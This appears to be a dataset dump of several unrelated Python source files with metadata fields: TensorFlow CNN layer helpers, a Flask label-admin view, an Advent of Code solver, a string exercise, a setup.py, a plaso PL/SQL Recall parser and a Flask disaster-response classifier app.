## Number of features will be img_height * img_width* num_channels. But we shall calculate it in place of hard-coding it.
num_features = layer_shape[1:4].num_elements()
## Now, we Flatten the layer so we shall have to reshape to num_features
layer = tf.reshape(layer, [-1, num_features])
return layer
def create_fc_layer(input,
num_inputs,
num_outputs,
use_relu=True):
#Let's define trainable weights and biases.
weights = create_weights(shape=[num_inputs, num_outputs])
biases = create_biases(num_outputs)
# Fully connected layer takes input x and produces wx+b.Since, these are matrices, we use matmul function in Tensorflow
layer = tf.matmul(input, weights) + biases
if use_relu:
layer = tf.nn.relu(layer)
return layer
| import tensorflow as tf
import numpy as np
def create_weights(shape):
return tf.Variable(tf.truncated_normal(shape, stddev=0.05))
def create_biases(size):
return tf.Variable(tf.constant(0.05, shape=[size]))
def create_convolutional_layer(input,
num_input_channels,
conv_filter_size,
num_filters):
## We shall define the weights that will be trained using create_weights function.
weights = create_weights(shape=[conv_filter_size, conv_filter_size, num_input_channels, num_filters])
## We create biases using the create_biases function. These are also trained.
biases = create_biases(num_filters)
## Creating the convolutional layer
layer = tf.nn.conv2d(input=input,
filter=weights,
strides=[1, 1, 1, 1],
padding='SAME')
layer += biases
## We shall be using max-pooling.
layer = tf.nn.max_pool(value=layer,
ksize=[1, 2, 2, 1],
strides=[1, 2, 2, 1],
padding='SAME')
## Output of pooling is fed to Relu which is the activation function for us.
layer = tf.nn.relu(layer)
return layer
def create_flatten_layer(layer):
#We know that the shape of the layer will be [batch_size img_size img_size num_channels]
# But let's get it from the previous layer.
layer_shape = layer.get_shape()
## Number of features will be img_height * img_width* num_channels. But we shall calculate it in place of hard-coding it.
num_features = layer_shape[1:4].num_elements()
## Now, we Flatten the layer so we shall have to reshape to num_features
layer = tf.reshape(layer, [-1, num_features])
return layer
def create_fc_layer(input,
num_inputs,
num_outputs,
use_relu=True):
#Let's define trainable weights and biases.
weights = create_weights(shape=[num_inputs, num_outputs])
biases = create_biases(num_outputs)
# Fully connected layer takes input x and produces wx+b.Since, these are matrices, we use matmul function in Tensorflow
layer = tf.matmul(input, weights) + biases
if use_relu:
layer = tf.nn.relu(layer)
return layer
| en | 0.828263 | ## We shall define the weights that will be trained using create_weights function. ## We create biases using the create_biases function. These are also trained. ## Creating the convolutional layer ## We shall be using max-pooling. ## Output of pooling is fed to Relu which is the activation function for us. #We know that the shape of the layer will be [batch_size img_size img_size num_channels] # But let's get it from the previous layer. ## Number of features will be img_height * img_width* num_channels. But we shall calculate it in place of hard-coding it. ## Now, we Flatten the layer so we shall have to reshape to num_features #Let's define trainable weights and biases. # Fully connected layer takes input x and produces wx+b.Since, these are matrices, we use matmul function in Tensorflow | 3.372107 | 3 |
textflow/view/dashboard/labels.py | ysenarath/textflow | 4 | 6616824 | """ project admin view """
from flask import flash, url_for, redirect
from flask_login import current_user
from flask_wtf import FlaskForm
from wtforms import StringField, FormField, FieldList, BooleanField, IntegerField
from wtforms.validators import DataRequired
from textflow import auth, services
from textflow.model import Label
from textflow.view.base import FakeBlueprint
__all__ = [
'LabelsForm',
'LabelForm'
]
view = FakeBlueprint()
class LabelForm(FlaskForm):
selected = BooleanField('selected')
id = StringField('ID')
label = StringField('Label', validators=[DataRequired()])
value = StringField('Value', validators=[DataRequired()])
order = IntegerField('Order', validators=[DataRequired()])
class LabelsForm(FlaskForm):
labels = FieldList(FormField(LabelForm))
@view.route('/projects/<project_id>/dashboard/labels', methods=['POST'])
@auth.login_required
@auth.roles_required(role='admin')
def create_label(project_id):
add_label_form = LabelForm()
if add_label_form.validate_on_submit():
lbl = add_label_form.data['label']
val = add_label_form.data['value']
order = add_label_form.data['order']
if services.filter_label(project_id=project_id, value=val) is None:
obj = Label(value=val, label=lbl, order=order, project_id=project_id)
services.db.session.add(obj)
services.db.session.commit()
else:
flash('Label with value "{}" exists. Please retry with another value.'.format(val))
else:
flash('Invalid form input. Please check and try again. Error: {}'.format(add_label_form.errors))
return redirect(url_for('dashboard.index', project_id=project_id))
@view.route('/projects/<project_id>/dashboard/labels/update', methods=['POST'])
@auth.login_required
@auth.roles_required(role='admin')
def update_labels(project_id):
labels = services.list_labels(user_id=current_user.id, project_id=project_id)
labels_form = LabelsForm(labels=labels)
for label_form in labels_form.labels:
label_id = label_form.data['id']
lbl = services.get_label(label_id=label_id)
label_form.form.populate_obj(lbl)
services.db.session.commit()
return redirect(url_for('dashboard.index', project_id=project_id))
@view.route('/projects/<project_id>/dashboard/labels/delete', methods=['POST'])
@auth.login_required
@auth.roles_required(role='admin')
def delete_labels(project_id):
labels = services.list_labels(user_id=current_user.id, project_id=project_id)
labels_form = LabelsForm(labels=labels)
none_selected = True
for ll in labels_form.labels:
if ll.data['selected']:
label_id = ll.data['id']
services.delete_label(label_id)
none_selected = False
if none_selected:
flash('You have to select labels that need to be removed first.')
return redirect(url_for('dashboard.index', project_id=project_id))
| """ project admin view """
from flask import flash, url_for, redirect
from flask_login import current_user
from flask_wtf import FlaskForm
from wtforms import StringField, FormField, FieldList, BooleanField, IntegerField
from wtforms.validators import DataRequired
from textflow import auth, services
from textflow.model import Label
from textflow.view.base import FakeBlueprint
__all__ = [
'LabelsForm',
'LabelForm'
]
view = FakeBlueprint()
class LabelForm(FlaskForm):
selected = BooleanField('selected')
id = StringField('ID')
label = StringField('Label', validators=[DataRequired()])
value = StringField('Value', validators=[DataRequired()])
order = IntegerField('Order', validators=[DataRequired()])
class LabelsForm(FlaskForm):
labels = FieldList(FormField(LabelForm))
@view.route('/projects/<project_id>/dashboard/labels', methods=['POST'])
@auth.login_required
@auth.roles_required(role='admin')
def create_label(project_id):
add_label_form = LabelForm()
if add_label_form.validate_on_submit():
lbl = add_label_form.data['label']
val = add_label_form.data['value']
order = add_label_form.data['order']
if services.filter_label(project_id=project_id, value=val) is None:
obj = Label(value=val, label=lbl, order=order, project_id=project_id)
services.db.session.add(obj)
services.db.session.commit()
else:
flash('Label with value "{}" exists. Please retry with another value.'.format(val))
else:
flash('Invalid form input. Please check and try again. Error: {}'.format(add_label_form.errors))
return redirect(url_for('dashboard.index', project_id=project_id))
@view.route('/projects/<project_id>/dashboard/labels/update', methods=['POST'])
@auth.login_required
@auth.roles_required(role='admin')
def update_labels(project_id):
labels = services.list_labels(user_id=current_user.id, project_id=project_id)
labels_form = LabelsForm(labels=labels)
for label_form in labels_form.labels:
label_id = label_form.data['id']
lbl = services.get_label(label_id=label_id)
label_form.form.populate_obj(lbl)
services.db.session.commit()
return redirect(url_for('dashboard.index', project_id=project_id))
@view.route('/projects/<project_id>/dashboard/labels/delete', methods=['POST'])
@auth.login_required
@auth.roles_required(role='admin')
def delete_labels(project_id):
labels = services.list_labels(user_id=current_user.id, project_id=project_id)
labels_form = LabelsForm(labels=labels)
none_selected = True
for ll in labels_form.labels:
if ll.data['selected']:
label_id = ll.data['id']
services.delete_label(label_id)
none_selected = False
if none_selected:
flash('You have to select labels that need to be removed first.')
return redirect(url_for('dashboard.index', project_id=project_id))
| en | 0.717459 | project admin view | 2.409609 | 2 |
2019/3/3.py | pshatov/AoC | 0 | 6616825 | <reponame>pshatov/AoC
line1 = ""
line2 = ""
with open('input.txt') as f:
line1 = f.readline().strip()
line2 = f.readline().strip()
class WireSegmentPoint:
def __init__(self, x, y):
self.x = x
self.y = y
class WireSegment:
def __init__(self, x1, y1, x2, y2, dir, len):
self.a = WireSegmentPoint(x1, y1)
self.b = WireSegmentPoint(x2, y2)
self.dir = dir
self.len = len
@property
def min_x(self):
return min(self.a.x, self.b.x)
@property
def max_x(self):
return max(self.a.x, self.b.x)
@property
def min_y(self):
return min(self.a.y, self.b.y)
@property
def max_y(self):
return max(self.a.y, self.b.y)
@property
def is_vertical(self):
return self.a.x == self.b.x
@property
def is_horizontal(self):
return self.a.y == self.b.y
@property
def range_x(self):
return range(self.min_x, self.max_x+1)
@property
def range_y(self):
return range(self.min_y, self.max_y+1)
def check_contains(self, cross):
return cross[0] in self.range_x and cross[1] in self.range_y
def check_cross(self, other_seg):
if self.is_vertical and other_seg.is_vertical:
if self.a.x == other_seg.a.x:
for y_self in self.range_y:
if y_self in other_seg.range_y:
return (self.a.x, y_self)
if self.is_horizontal and other_seg.is_horizontal:
if self.a.y == other_seg.a.y:
for x_self in self.range_x:
if x_self in other_seg.range_x:
return (x_self, self.a.y)
if self.is_vertical and other_seg.is_horizontal:
if other_seg.a.y in self.range_y and self.a.x in other_seg.range_x:
return (self.a.x, other_seg.a.y)
if self.is_horizontal and other_seg.is_vertical:
if other_seg.a.x in self.range_x and self.a.y in other_seg.range_y:
return (other_seg.a.x, self.a.y)
def get_wire_segments(line):
segs = []
old_x = 0
old_y = 0
line_segs = line.split(",")
for line_seg in line_segs:
line_seg_dir = line_seg[:1]
line_seg_len = int(line_seg[1:])
new_x = old_x
new_y = old_y
if line_seg_dir == "D": new_y -= line_seg_len
elif line_seg_dir == "U": new_y += line_seg_len
elif line_seg_dir == "L": new_x -= line_seg_len
elif line_seg_dir == "R": new_x += line_seg_len
else: raise Exception("Bad segment_direction ('%s')!" % line_seg_dir)
seg = WireSegment(old_x, old_y, new_x, new_y, line_seg_dir, line_seg_len)
segs.append(seg)
old_x = new_x
old_y = new_y
return segs
def calc_steps(segs, cross):
x = 0
y = 0
steps = 0
for next_seg in segs:
for i in range(next_seg.len):
if next_seg.dir == "D": y -= 1
elif next_seg.dir == "U": y += 1
elif next_seg.dir == "L": x -= 1
elif next_seg.dir == "R": x += 1
else: raise Exception("Bad segment direction ('%s')!" % next_seg.dir)
steps += 1
if x == cross[0] and y == cross[1]:
return steps
raise Exception("calc_steps() failed...")
segs1 = get_wire_segments(line1)
segs2 = get_wire_segments(line2)
crosses = []
for next_seg1 in segs1:
for next_seg2 in segs2:
cross = next_seg1.check_cross(next_seg2)
if not cross is None:
if cross[0] != 0 or cross[1] != 0:
crosses.append(cross)
i = 0
for next_cross in crosses:
dist = abs(next_cross[0]) + abs(next_cross[1])
if i == 0: min_dist = dist
elif dist < min_dist: min_dist = dist
i += 1
print("min_dist = %d" % min_dist)
i = 0
for next_cross in crosses:
steps1 = calc_steps(segs1, next_cross)
steps2 = calc_steps(segs2, next_cross)
steps = steps1 + steps2
if i == 0: min_steps = steps
elif steps < min_steps: min_steps = steps
i += 1
print("%d + %d = %d [min: %d]" % (steps1, steps2, steps, min_steps))
print("min_steps = %d" % min_steps)
| line1 = ""
line2 = ""
with open('input.txt') as f:
line1 = f.readline().strip()
line2 = f.readline().strip()
class WireSegmentPoint:
def __init__(self, x, y):
self.x = x
self.y = y
class WireSegment:
def __init__(self, x1, y1, x2, y2, dir, len):
self.a = WireSegmentPoint(x1, y1)
self.b = WireSegmentPoint(x2, y2)
self.dir = dir
self.len = len
@property
def min_x(self):
return min(self.a.x, self.b.x)
@property
def max_x(self):
return max(self.a.x, self.b.x)
@property
def min_y(self):
return min(self.a.y, self.b.y)
@property
def max_y(self):
return max(self.a.y, self.b.y)
@property
def is_vertical(self):
return self.a.x == self.b.x
@property
def is_horizontal(self):
return self.a.y == self.b.y
@property
def range_x(self):
return range(self.min_x, self.max_x+1)
@property
def range_y(self):
return range(self.min_y, self.max_y+1)
def check_contains(self, cross):
return cross[0] in self.range_x and cross[1] in self.range_y
def check_cross(self, other_seg):
if self.is_vertical and other_seg.is_vertical:
if self.a.x == other_seg.a.x:
for y_self in self.range_y:
if y_self in other_seg.range_y:
return (self.a.x, y_self)
if self.is_horizontal and other_seg.is_horizontal:
if self.a.y == other_seg.a.y:
for x_self in self.range_x:
if x_self in other_seg.range_x:
return (x_self, self.a.y)
if self.is_vertical and other_seg.is_horizontal:
if other_seg.a.y in self.range_y and self.a.x in other_seg.range_x:
return (self.a.x, other_seg.a.y)
if self.is_horizontal and other_seg.is_vertical:
if other_seg.a.x in self.range_x and self.a.y in other_seg.range_y:
return (other_seg.a.x, self.a.y)
def get_wire_segments(line):
segs = []
old_x = 0
old_y = 0
line_segs = line.split(",")
for line_seg in line_segs:
line_seg_dir = line_seg[:1]
line_seg_len = int(line_seg[1:])
new_x = old_x
new_y = old_y
if line_seg_dir == "D": new_y -= line_seg_len
elif line_seg_dir == "U": new_y += line_seg_len
elif line_seg_dir == "L": new_x -= line_seg_len
elif line_seg_dir == "R": new_x += line_seg_len
else: raise Exception("Bad segment_direction ('%s')!" % line_seg_dir)
seg = WireSegment(old_x, old_y, new_x, new_y, line_seg_dir, line_seg_len)
segs.append(seg)
old_x = new_x
old_y = new_y
return segs
def calc_steps(segs, cross):
x = 0
y = 0
steps = 0
for next_seg in segs:
for i in range(next_seg.len):
if next_seg.dir == "D": y -= 1
elif next_seg.dir == "U": y += 1
elif next_seg.dir == "L": x -= 1
elif next_seg.dir == "R": x += 1
else: raise Exception("Bad segment direction ('%s')!" % next_seg.dir)
steps += 1
if x == cross[0] and y == cross[1]:
return steps
raise Exception("calc_steps() failed...")
segs1 = get_wire_segments(line1)
segs2 = get_wire_segments(line2)
crosses = []
for next_seg1 in segs1:
for next_seg2 in segs2:
cross = next_seg1.check_cross(next_seg2)
if not cross is None:
if cross[0] != 0 or cross[1] != 0:
crosses.append(cross)
i = 0
for next_cross in crosses:
dist = abs(next_cross[0]) + abs(next_cross[1])
if i == 0: min_dist = dist
elif dist < min_dist: min_dist = dist
i += 1
print("min_dist = %d" % min_dist)
i = 0
for next_cross in crosses:
steps1 = calc_steps(segs1, next_cross)
steps2 = calc_steps(segs2, next_cross)
steps = steps1 + steps2
if i == 0: min_steps = steps
elif steps < min_steps: min_steps = steps
i += 1
print("%d + %d = %d [min: %d]" % (steps1, steps2, steps, min_steps))
print("min_steps = %d" % min_steps) | none | 1 | 3.411961 | 3 | |
Python String.py | Farhan-Khalifa-Ibrahim/CodeAcademy | 1 | 6616826 | <gh_stars>1-10
lovely_loveseat_description = "Lovely Loveseat. Tufted polyester blend on wood. 32 inches high x 40 inches wide x 30 inches deep. Red or white."
lovely_loveseat_price = 254.00
stylish_settee_description = "Stylish Settee. Faux leather on birch. 29.50 inches high x 54.75 inches wide x 28 inches deep. Black."
stylish_settee_price = 180.50
luxurious_lamp_description = "Luxurious Lamp. Glass and iron. 36 inches tall. Brown with cream shade."
luxurious_lamp_price = 52.15
sales_tax = 0.088
customer_one_total = 0
customer_one_itemization = ""
customer_one_total += lovely_loveseat_price
print(customer_one_total)
customer_one_itemization+=lovely_loveseat_description
print(customer_one_itemization)
customer_one_total+=luxurious_lamp_price
print(customer_one_total)
customer_one_itemization+=","+luxurious_lamp_description
print(customer_one_itemization)
customer_one_tax = customer_one_total*sales_tax
customer_one_total += customer_one_tax
print("customer one total: \n{} \nCustomer One Items: \n{}".format(customer_one_total,customer_one_itemization)) | lovely_loveseat_description = "Lovely Loveseat. Tufted polyester blend on wood. 32 inches high x 40 inches wide x 30 inches deep. Red or white."
lovely_loveseat_price = 254.00
stylish_settee_description = "Stylish Settee. Faux leather on birch. 29.50 inches high x 54.75 inches wide x 28 inches deep. Black."
stylish_settee_price = 180.50
luxurious_lamp_description = "Luxurious Lamp. Glass and iron. 36 inches tall. Brown with cream shade."
luxurious_lamp_price = 52.15
sales_tax = 0.088
customer_one_total = 0
customer_one_itemization = ""
customer_one_total += lovely_loveseat_price
print(customer_one_total)
customer_one_itemization+=lovely_loveseat_description
print(customer_one_itemization)
customer_one_total+=luxurious_lamp_price
print(customer_one_total)
customer_one_itemization+=","+luxurious_lamp_description
print(customer_one_itemization)
customer_one_tax = customer_one_total*sales_tax
customer_one_total += customer_one_tax
print("customer one total: \n{} \nCustomer One Items: \n{}".format(customer_one_total,customer_one_itemization)) | none | 1 | 2.136381 | 2 | |
setup.py | brandtbucher/these | 4 | 6616827 | import setuptools
with open("README.md") as readme:
long_description = readme.read()
setuptools.setup(
author="<NAME>",
author_email="<EMAIL>",
description="The Markov Zenerator.",
keywords="Markov Zen this",
license="MIT",
long_description=long_description,
long_description_content_type="text/markdown",
name="these",
py_modules=['these'],
url="https://github.com/brandtbucher/these",
version=1,
)
| import setuptools
with open("README.md") as readme:
long_description = readme.read()
setuptools.setup(
author="<NAME>",
author_email="<EMAIL>",
description="The Markov Zenerator.",
keywords="Markov Zen this",
license="MIT",
long_description=long_description,
long_description_content_type="text/markdown",
name="these",
py_modules=['these'],
url="https://github.com/brandtbucher/these",
version=1,
)
| none | 1 | 1.351533 | 1 | |
plaso/parsers/pls_recall.py | ir4n6/plaso | 0 | 6616828 | # -*- coding: utf-8 -*-
"""Parser for PL/SQL Developer Recall files."""
from __future__ import unicode_literals
import os
import construct
from dfdatetime import delphi_date_time as dfdatetime_delphi_date_time
from plaso.containers import events
from plaso.containers import time_events
from plaso.lib import errors
from plaso.lib import definitions
from plaso.lib import timelib
from plaso.lib import utils
from plaso.parsers import interface
from plaso.parsers import manager
class PlsRecallEventData(events.EventData):
"""PL/SQL Recall event data.
Attributes:
database_name (str): name of the database.
query (str): PL/SQL query.
sequence_number (int): sequence number.
username (str): username used to query.
"""
DATA_TYPE = 'PLSRecall:event'
def __init__(self):
"""Initializes event data."""
super(PlsRecallEventData, self).__init__(data_type=self.DATA_TYPE)
self.database_name = None
self.query = None
self.sequence_number = None
self.username = None
class PlsRecallParser(interface.FileObjectParser):
"""Parse PL/SQL Recall files.
Parser is based on:
TRecallRecord = packed record
Sequence: Integer;
TimeStamp: TDateTime;
Username: array[0..30] of Char;
Database: array[0..80] of Char;
Text: array[0..4000] of Char;
end;
Delphi TDateTime is a little-endian 64-bit floating-point value without
time zone information.
"""
_INITIAL_FILE_OFFSET = None
_PLS_KEYWORD = frozenset([
'begin', 'commit', 'create', 'declare', 'drop', 'end', 'exception',
'execute', 'insert', 'replace', 'rollback', 'select', 'set',
'update'])
# 6 * 365 * 24 * 60 * 60 * 1000000.
_SIX_YEARS_IN_MICRO_SECONDS = 189216000000000
NAME = 'pls_recall'
DESCRIPTION = 'Parser for PL/SQL Recall files.'
_PLS_RECALL_RECORD = construct.Struct(
'PL/SQL_Recall',
construct.ULInt32('Sequence'),
construct.LFloat64('TimeStamp'),
construct.String('Username', 31, None, b'\x00'),
construct.String('Database', 81, None, b'\x00'),
construct.String('Query', 4001, None, b'\x00'))
def ParseFileObject(self, parser_mediator, file_object, **kwargs):
"""Parses a PLSRecall.dat file-like object.
Args:
parser_mediator (ParserMediator): mediates interactions between parsers
and other components, such as storage and dfvfs.
file_object (dfvfs.FileIO): a file-like object.
Raises:
UnableToParseFile: when the file cannot be parsed.
"""
try:
is_pls = self.VerifyFile(file_object)
except (IOError, construct.FieldError) as exception:
raise errors.UnableToParseFile((
'Not a PLSrecall File, unable to parse.'
'with error: {0!s}').format(exception))
if not is_pls:
raise errors.UnableToParseFile(
'Not a PLSRecall File, unable to parse.')
file_object.seek(0, os.SEEK_SET)
pls_record = self._PLS_RECALL_RECORD.parse_stream(file_object)
while pls_record:
event_data = PlsRecallEventData()
event_data.database_name = pls_record.Database
event_data.sequence_number = pls_record.Sequence
event_data.query = pls_record.Query
event_data.username = pls_record.Username
date_time = dfdatetime_delphi_date_time.DelphiDateTime(
timestamp=pls_record.TimeStamp)
event = time_events.DateTimeValuesEvent(
date_time, definitions.TIME_DESCRIPTION_WRITTEN)
parser_mediator.ProduceEventWithEventData(event, event_data)
try:
pls_record = self._PLS_RECALL_RECORD.parse_stream(file_object)
except construct.FieldError:
# The code has reached the end of file (EOF).
break
def VerifyFile(self, file_object):
"""Check if the file is a PLSRecall.dat file.
Args:
file_object (dfvfs.FileIO): a file-like object.
Returns:
bool: True if this is a valid PLSRecall.dat file, False otherwise.
"""
file_object.seek(0, os.SEEK_SET)
# The file consists of PL/SQL structures that are equal
# size (4125 bytes) TRecallRecord records. It should be
# noted that the query value is free form.
try:
structure = self._PLS_RECALL_RECORD.parse_stream(file_object)
except (IOError, construct.FieldError):
return False
# Verify that the timestamp is no more than six years into the future.
# Six years is an arbitrary time length just to evaluate the timestamp
# against some value. There is no guarantee that this will catch everything.
# TODO: Add a check for similarly valid value back in time. Maybe if it the
# timestamp is before 1980 we are pretty sure it is invalid?
# TODO: This is a very flaky assumption. Find a better one.
future_timestamp = (
timelib.Timestamp.GetNow() + self._SIX_YEARS_IN_MICRO_SECONDS)
if structure.TimeStamp > future_timestamp:
return False
# TODO: Add other verification checks here. For instance make sure
# that the query actually looks like a SQL query. This structure produces a
# lot of false positives and thus we need to add additional verification to
# make sure we are not parsing non-PLSRecall files.
# Another check might be to make sure the username looks legitimate, or the
# sequence number, or the database name.
# For now we just check if all three fields pass our "is this a text" test.
if not utils.IsText(structure.Username):
return False
if not utils.IsText(structure.Query):
return False
if not utils.IsText(structure.Database):
return False
# Take the first word from the query field and attempt to match that against
# allowed queries.
first_word, _, _ = structure.Query.partition(b' ')
if first_word.lower() not in self._PLS_KEYWORD:
return False
return True
manager.ParsersManager.RegisterParser(PlsRecallParser)
| # -*- coding: utf-8 -*-
"""Parser for PL/SQL Developer Recall files."""
from __future__ import unicode_literals
import os
import construct
from dfdatetime import delphi_date_time as dfdatetime_delphi_date_time
from plaso.containers import events
from plaso.containers import time_events
from plaso.lib import errors
from plaso.lib import definitions
from plaso.lib import timelib
from plaso.lib import utils
from plaso.parsers import interface
from plaso.parsers import manager
class PlsRecallEventData(events.EventData):
"""PL/SQL Recall event data.
Attributes:
database_name (str): name of the database.
query (str): PL/SQL query.
sequence_number (int): sequence number.
username (str): username used to query.
"""
DATA_TYPE = 'PLSRecall:event'
def __init__(self):
"""Initializes event data."""
super(PlsRecallEventData, self).__init__(data_type=self.DATA_TYPE)
self.database_name = None
self.query = None
self.sequence_number = None
self.username = None
class PlsRecallParser(interface.FileObjectParser):
"""Parse PL/SQL Recall files.
Parser is based on:
TRecallRecord = packed record
Sequence: Integer;
TimeStamp: TDateTime;
Username: array[0..30] of Char;
Database: array[0..80] of Char;
Text: array[0..4000] of Char;
end;
Delphi TDateTime is a little-endian 64-bit floating-point value without
time zone information.
"""
_INITIAL_FILE_OFFSET = None
_PLS_KEYWORD = frozenset([
'begin', 'commit', 'create', 'declare', 'drop', 'end', 'exception',
'execute', 'insert', 'replace', 'rollback', 'select', 'set',
'update'])
# 6 * 365 * 24 * 60 * 60 * 1000000.
_SIX_YEARS_IN_MICRO_SECONDS = 189216000000000
NAME = 'pls_recall'
DESCRIPTION = 'Parser for PL/SQL Recall files.'
_PLS_RECALL_RECORD = construct.Struct(
'PL/SQL_Recall',
construct.ULInt32('Sequence'),
construct.LFloat64('TimeStamp'),
construct.String('Username', 31, None, b'\x00'),
construct.String('Database', 81, None, b'\x00'),
construct.String('Query', 4001, None, b'\x00'))
def ParseFileObject(self, parser_mediator, file_object, **kwargs):
"""Parses a PLSRecall.dat file-like object.
Args:
parser_mediator (ParserMediator): mediates interactions between parsers
and other components, such as storage and dfvfs.
file_object (dfvfs.FileIO): a file-like object.
Raises:
UnableToParseFile: when the file cannot be parsed.
"""
try:
is_pls = self.VerifyFile(file_object)
except (IOError, construct.FieldError) as exception:
raise errors.UnableToParseFile((
'Not a PLSrecall File, unable to parse.'
'with error: {0!s}').format(exception))
if not is_pls:
raise errors.UnableToParseFile(
'Not a PLSRecall File, unable to parse.')
file_object.seek(0, os.SEEK_SET)
pls_record = self._PLS_RECALL_RECORD.parse_stream(file_object)
while pls_record:
event_data = PlsRecallEventData()
event_data.database_name = pls_record.Database
event_data.sequence_number = pls_record.Sequence
event_data.query = pls_record.Query
event_data.username = pls_record.Username
date_time = dfdatetime_delphi_date_time.DelphiDateTime(
timestamp=pls_record.TimeStamp)
event = time_events.DateTimeValuesEvent(
date_time, definitions.TIME_DESCRIPTION_WRITTEN)
parser_mediator.ProduceEventWithEventData(event, event_data)
try:
pls_record = self._PLS_RECALL_RECORD.parse_stream(file_object)
except construct.FieldError:
# The code has reached the end of file (EOF).
break
def VerifyFile(self, file_object):
"""Check if the file is a PLSRecall.dat file.
Args:
file_object (dfvfs.FileIO): a file-like object.
Returns:
bool: True if this is a valid PLSRecall.dat file, False otherwise.
"""
file_object.seek(0, os.SEEK_SET)
# The file consists of PL/SQL structures that are equal
# size (4125 bytes) TRecallRecord records. It should be
# noted that the query value is free form.
try:
structure = self._PLS_RECALL_RECORD.parse_stream(file_object)
except (IOError, construct.FieldError):
return False
# Verify that the timestamp is no more than six years into the future.
# Six years is an arbitrary time length just to evaluate the timestamp
# against some value. There is no guarantee that this will catch everything.
# TODO: Add a check for similarly valid value back in time. Maybe if it the
# timestamp is before 1980 we are pretty sure it is invalid?
# TODO: This is a very flaky assumption. Find a better one.
future_timestamp = (
timelib.Timestamp.GetNow() + self._SIX_YEARS_IN_MICRO_SECONDS)
if structure.TimeStamp > future_timestamp:
return False
# TODO: Add other verification checks here. For instance make sure
# that the query actually looks like a SQL query. This structure produces a
# lot of false positives and thus we need to add additional verification to
# make sure we are not parsing non-PLSRecall files.
# Another check might be to make sure the username looks legitimate, or the
# sequence number, or the database name.
# For now we just check if all three fields pass our "is this a text" test.
if not utils.IsText(structure.Username):
return False
if not utils.IsText(structure.Query):
return False
if not utils.IsText(structure.Database):
return False
# Take the first word from the query field and attempt to match that against
# allowed queries.
first_word, _, _ = structure.Query.partition(b' ')
if first_word.lower() not in self._PLS_KEYWORD:
return False
return True
manager.ParsersManager.RegisterParser(PlsRecallParser)
| en | 0.850636 | # -*- coding: utf-8 -*- Parser for PL/SQL Developer Recall files. PL/SQL Recall event data. Attributes: database_name (str): name of the database. query (str): PL/SQL query. sequence_number (int): sequence number. username (str): username used to query. Initializes event data. Parse PL/SQL Recall files. Parser is based on: TRecallRecord = packed record Sequence: Integer; TimeStamp: TDateTime; Username: array[0..30] of Char; Database: array[0..80] of Char; Text: array[0..4000] of Char; end; Delphi TDateTime is a little-endian 64-bit floating-point value without time zone information. # 6 * 365 * 24 * 60 * 60 * 1000000. Parses a PLSRecall.dat file-like object. Args: parser_mediator (ParserMediator): mediates interactions between parsers and other components, such as storage and dfvfs. file_object (dfvfs.FileIO): a file-like object. Raises: UnableToParseFile: when the file cannot be parsed. # The code has reached the end of file (EOF). Check if the file is a PLSRecall.dat file. Args: file_object (dfvfs.FileIO): a file-like object. Returns: bool: True if this is a valid PLSRecall.dat file, False otherwise. # The file consists of PL/SQL structures that are equal # size (4125 bytes) TRecallRecord records. It should be # noted that the query value is free form. # Verify that the timestamp is no more than six years into the future. # Six years is an arbitrary time length just to evaluate the timestamp # against some value. There is no guarantee that this will catch everything. # TODO: Add a check for similarly valid value back in time. Maybe if it the # timestamp is before 1980 we are pretty sure it is invalid? # TODO: This is a very flaky assumption. Find a better one. # TODO: Add other verification checks here. For instance make sure # that the query actually looks like a SQL query. This structure produces a # lot of false positives and thus we need to add additional verification to # make sure we are not parsing non-PLSRecall files. # Another check might be to make sure the username looks legitimate, or the # sequence number, or the database name. # For now we just check if all three fields pass our "is this a text" test. # Take the first word from the query field and attempt to match that against # allowed queries. | 2.036978 | 2 |
app/run.py | prabhatdutt95/Disaster-Response-Pipeline | 1 | 6616829 |
import pandas as pd
from nltk.corpus import stopwords
from nltk.stem import WordNetLemmatizer
from nltk.tokenize import word_tokenize
from flask import Flask
from flask import render_template, request
from plotly.graph_objs import Bar
import re
import joblib
from sqlalchemy import create_engine
import json
import plotly
# initializing Flask app
app = Flask(__name__)
def tokenize(text):
"""
Tokenizes text data
Args:
text str: Messages as text data
Returns:
# clean_tokens list: Processed text after normalizing, tokenizing and lemmatizing
words list: Processed text after normalizing, tokenizing and lemmatizing
"""
# Normalize text
text = re.sub(r"[^a-zA-Z0-9]", " ", text.lower())
# tokenize text
words = word_tokenize(text)
# remove stop words
stopwords_ = stopwords.words("english")
words = [word for word in words if word not in stopwords_]
# extract root form of words
words = [WordNetLemmatizer().lemmatize(word, pos='v') for word in words]
return words
# load data
engine = create_engine('sqlite:///../data/DisasterResponse.db')
df = pd.read_sql_table('DisasterResponse', engine)
# load model
model = joblib.load("../models/classifier.pkl")
# index webpage displays cool visuals and receives user input text for model
@app.route('/')
@app.route('/index')
def index():
# Extract data needed for visuals
# count messsages based on whether genre is related or not
genre_related_counts = df[df['related'] == 1].groupby('genre')['message'].count()
genre_not_related_counts = df[df['related'] == 0].groupby('genre')['message'].count()
# label for the genre
genre_names = list(genre_related_counts.index)
# Calculate proportion of each category with label = 1
category_proportion = df[df.columns[4:]].sum()/len(df)
category_proportion = category_proportion.sort_values(ascending = False)
# category labels
category = list(category_proportion.index)
# create visuals
figures = [
{
'data': [
Bar(
x = genre_names,
y = genre_related_counts,
name = 'Genre: Related'
),
Bar(
x = genre_names,
y = genre_not_related_counts,
name = 'Genre: Not Related'
)
],
'layout': {
'title': 'Distribution of Messages by Genre and Related Status',
'xaxis': {
'title': "Genre"
}, 'yaxis': {
'title': "Count of Messages"
}, 'barmode': 'group'
}
},
{
'data': [
Bar(
x = category,
y = category_proportion
)
],
'layout': {
'title': 'Proportion of Messages <br> by Category',
'xaxis': {
'title': "Category",
'tickangle': -45,
'automargin': True
}, 'yaxis': {
'title': "Proportion",
'automargin': True
}
}
}
]
# encode plotly graphs in JSON
ids = ["figure-{}".format(i) for i, _ in enumerate(figures)]
figuresJSON = json.dumps(figures, cls=plotly.utils.PlotlyJSONEncoder)
# render web page with plotly figures
return render_template('master.html', ids=ids, figuresJSON=figuresJSON, data_set=df)
# web page that handles user query and displays model results
@app.route('/go')
def go():
# save user input in query
query = request.args.get('query', '')
# use model to predict classification for query
categories = df.columns[4:]
# print('categories data is',categories)
classification_labels = model.predict([query])[0]
classification_results = dict(zip(categories, classification_labels))
positive_results = [key.replace('_', ' ').title() for key,value in classification_results.items() if value == 1]
# print(positive_results, len(positive_results))
# print('classification result is',classification_results)
# This will render the go.html Please see that file.
return render_template('go.html',
query=query,
classification_result=classification_results,
positive_results = positive_results
)
def main():
app.run(host='0.0.0.0', port=3001, debug=True)
if __name__ == '__main__':
main()
|
